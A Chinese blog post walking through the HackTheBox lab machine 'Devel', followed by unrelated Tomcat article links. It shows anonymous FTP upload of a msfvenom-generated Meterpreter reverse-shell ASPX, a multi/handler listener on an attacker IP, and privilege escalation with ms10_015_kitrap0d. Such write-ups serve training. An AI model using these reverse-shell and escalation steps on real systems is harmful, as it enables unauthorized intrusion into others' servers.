HackTheBox-Machines--Devel

已于 2024-03-28 17:52:54 修改
阅读量266 收藏 4
点赞数 5
分类专栏: 靶场集合 # HACK THE BOX 文章标签: Hack The Box 21 anonymous 登录 MSF
于 2024-03-28 17:50:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sycamorelg/article/details/137113808
版权
本文详细描述了在IT技术渗透测试中,从使用nmap进行端口扫描,到检测21和80端口的漏洞,通过上传ASP.NET文件获取反弹shell,再到利用msfvenom进行权限提升的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文章目录

Devel 测试过程

1 端口扫描

nmap -sC -sV 10.129.243.101

在这里插入图片描述

2 测试思路

目标开启了21、80端口,21端口存在匿名登陆。如果可以通过21端口上传脚本文件,可通过反弹shell获取权限。

3 漏洞测试

ftp rhost

在这里插入图片描述

访问80端口,发现网站框架为ASP.NET,那就可以通过上传asp文件进行反弹shell

在这里插入图片描述

# 使用msfvenom深层devel.aspx脚本
msfvenom -p windows/meterpreter/reverse_tcp lhost=<lhost> lport=<lport> -f aspx > devel.aspx

# 通过put上传devel.aspx文件
put devel.aspx

在这里插入图片描述

# 执行监听
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.14.53
run

浏览器访问http://10.129.243.101/devel.aspx

在这里插入图片描述

# 查看当前权限
getuid

在这里插入图片描述

# 查看补丁情况
systeminfo

pl

# 利用  post/multi/recon/local_exploit_suggester 模块查找可能存在的潜在权限
use post/multi/recon/local_exploit_suggester
set session 4
run

在这里插入图片描述

在这里插入图片描述

使用exploit/windows/local/ms10_015_kitrap0d模块进行权限提升

在这里插入图片描述

# flag
type C:\Users\babis\Desktop\user.txt
type C:\Users\Administrator\Desktop\root.txt
Tomcat服务器下载、安装、配置环境变量教程(超详细)
两行代码 踏踏实实de工作
10-31 64万+
未经我的允许,请不要转载我的文章,在此郑重声明!!! 请先配置安装好Java的环境,若没有安装,请参照我博客上的步骤进行安装! 安装Java环境教程https://blog.csdn.net/qq_40881680/article/details/83585542 Tomcat部署Web项目(一)·内嵌https://blog.csdn.net/qq_40881680/article/d......
Java面试——Tomcat
程序猿进阶
07-31 6023
优质博文:IT_BLOG_CN中最顶层的容器是,代表着整个服务器,从上图中可以看出,一个可以包含至少一个,用于具体提供服务。主要包含两个部分:和。从上图中可以看出的心脏就是这两个组件,他们的作用如下: 【1】用于处理连接相关的事情,并提供与和 相关的转化; 【2】用于封装和管理,以及具体处理请求;一个中只有一个,一个可以包含多个,一个 只有一个,但是可以有多个,这是因为一个服务可以有多个连接,如同时提供和链接,也可以提供向相同协议不同端口的连接,示意图如下(、、下边会说到): 多个和一个就形成了一个,有了就
JavaWeb篇——Tomcat下载安装和使用,Tomcat常见配置,IDEA配置Tomcat等技术点,详细的安装和使用教程,干货满满!
我热爱学习,也乐于分享。无论是科技前沿的洞见,还是生活中的小技巧,我都会在这里与你分享。我相信,知识就是力量,而分享则能让这份力量得到更好的传递。
01-18 1545
Tomcat是一个开源的Java Servlet容器,也是一个轻量级的应用服务器。它由Apache软件基金会开发和维护,并且符合Java EE(Java Enterprise Edition)规范。Tomcat被广泛用来部署和运行Java Web应用程序。Tomcat的主要功能是处理来自客户端的HTTP请求,并将其转发给适当的Java Servlet、JSP(JavaServer Pages)或其他Web组件进行处理。
Tomcat 支持Java 版本兼容性总结
热门推荐
Fred Lee的程序人生
12-28 1万+
最新最全的Tomcat 支持Java版本对照,即兼容性一览表: Servlet Spec JSP Spec EL Spec WebSocket Spec Apache Tomcat version Actual release revision Support Java Versions 4.0 TBD (2.4?) TBD (3.1?) TBD (1.
Tomcat版本Java版本的关系
最新发布
慕容雪_的博客
02-27 291
1、Tomcat历史版本。2、对应的Java版本。只要有积累,就会有进步。
tomcat兼容性验证
雪绒~
02-23 244
tomcat兼容性验证
jdk和tomcat版本对应
luguodehua的博客
05-17 1万+
Servlet SpecJSP SpecEL SpecWebSocket SpecJASPIC SpecApache Tomcat versionActual release revisionSupported Java Versions4.0TBD (2.4?)TBD (3.1?)TBD (1.2?)1.19.0.x9.0.0.M4 (alpha)8 and later3.12.33.01.11...
Tomcat之多JAVA环境JVM版本查看及使用优先级
月生的静心苑
05-30 2095
实际上Tomcat实例运行时依赖的java环境是取值于JRE_HOME,如果找不到则使用JAVA_HOME赋值给JRE_HOME。如果是多实例环境运行,为了减少系统可能的多java版本带来的影响,建议使用JRE_HOME定义java环境。
Windows-tomcat 部署Java项目
y2964的博客
08-08 2601
Oracle官网地址。
基于Tomcat7、Java、Ext、WebSocket的聊天室
08-01
首先,Tomcat7是一个流行的开源Java Servlet容器,它支持Java EE 7规范,包括Servlet 3.0、JSP 2.3等。在这个项目中,Tomcat7作为服务器端的核心组件,负责处理HTTP请求,提供动态内容服务,并通过WebSocket协议为...
关于在Eclipse中部署服务器Tomcat版本不兼容问题
user_xlg的博客
11-04 1542
关于在Eclipse中部署服务器Tomcat版本不兼容问题 问题描述 本人的JDK版本是JDK1.8,编辑器为Eclipse,tomcat版本tomcat v-8.5.41。当本人兴致冲冲的在 Eclipse中部署服务器时,碰到了下面截图所示的问题 发现图中的 finish 按钮是灰色的,随即意识到上述的操作中出现了问题。 解决 在上网搜索问题后,发现JDK1.8版本有时候不兼容tomcat v-8.5.41版本。 但是本人既不想在官网上下载新的JDK版本,又不想下载旧的tomcat版本。在这里不得不说
TomcatJava版本对照(转)
OPM的博客
04-14 1337
转载自:https://blog.csdn.net/mengdong_zy/article/details/54924254 表格来自http://tomcat.apache.org/whichversion.html
java tomcat版本_#J001 TomcatJava版本对照
weixin_39605894的博客
02-12 148
Apache Tomcat 版本 最新发布版本 支持JAVA版本9.0.x 9.0.0.M17 (alpha) 8 and later8.5.x 8.5.11 ...
tomcat java版本,我如何找到Tomcat6正在使用的Java版本
weixin_36385884的博客
02-16 102
Is there a OS command to find what Java version Tomcat6 is using?I need to use a Perl (including system()) command.I using Linux. Ubuntu and CentOSIs there something like?tomcat6 version解决方案At first ...
Java——Servlet、Tomcat版本对应
天上的光博客
04-11 1009
图片来自Apache官网
tomcat配置(java环境配置)
m0_70750601的博客
08-01 2050
rw-------. 1 root root 1149 7月 8 05:02 jaspic-providers.xml。-rw-------. 1 root root 2313 7月 8 05:02 jaspic-providers.xsd。-rw-------. 1 root root 2756 7月 8 05:02 tomcat-users.xml。-rw-------. 1 root root 2558 7月 8 05:02 tomcat-users.xsd。
Tomcat(4) Tomcat支持哪些版本Java
qq_43012298的博客
11-08 1120
Tomcat支持多个Java版本,但最佳实践是使用与Tomcat版本兼容的Java版本。通过设置正确的环境变量和配置文件,可以确保Tomcat使用指定的Java版本运行。在开发和部署Java Web应用时,应始终检查TomcatJava版本兼容性,以确保应用的稳定性和性能。
jdk1.8,tomcat8.0.32,java EE版(Mars.1 Release(4.5.1))的保姆级安装及环境配置
m0_62060794的博客
11-19 3584
当客户端浏览器向服务器发出请求时,服务器将会加载jsp文件,并将jsp文件转化为servlet代码,然后jsp引擎把servlet代码编译为class文件,最后服务器加载执行class文件,最后把执行结果发送回浏览器进行显示。2.展开刚刚建好的项目,右键WebContent,new,选择XML File(若无该选项,选择Other,然后找到XML展开,选择XML File),next,然后对xml文件进行命名,finish。传入:右键空白,import,WAR file,选择导入即可。
tomcat乱码问题---java版本太高
zsjjsd的博客
05-25 261
如果遇到编码问题,编码都一致,测试输出和debug都没问题但是前端传值到后端输出必输出乱码那么就可以考虑是源头java的问题了(这个乱码问题我找了一上午也没找到问题,是最后拿java8的其他电脑测试才发现是java版本问题)加油!呜呜呜…
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

李沉肩

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值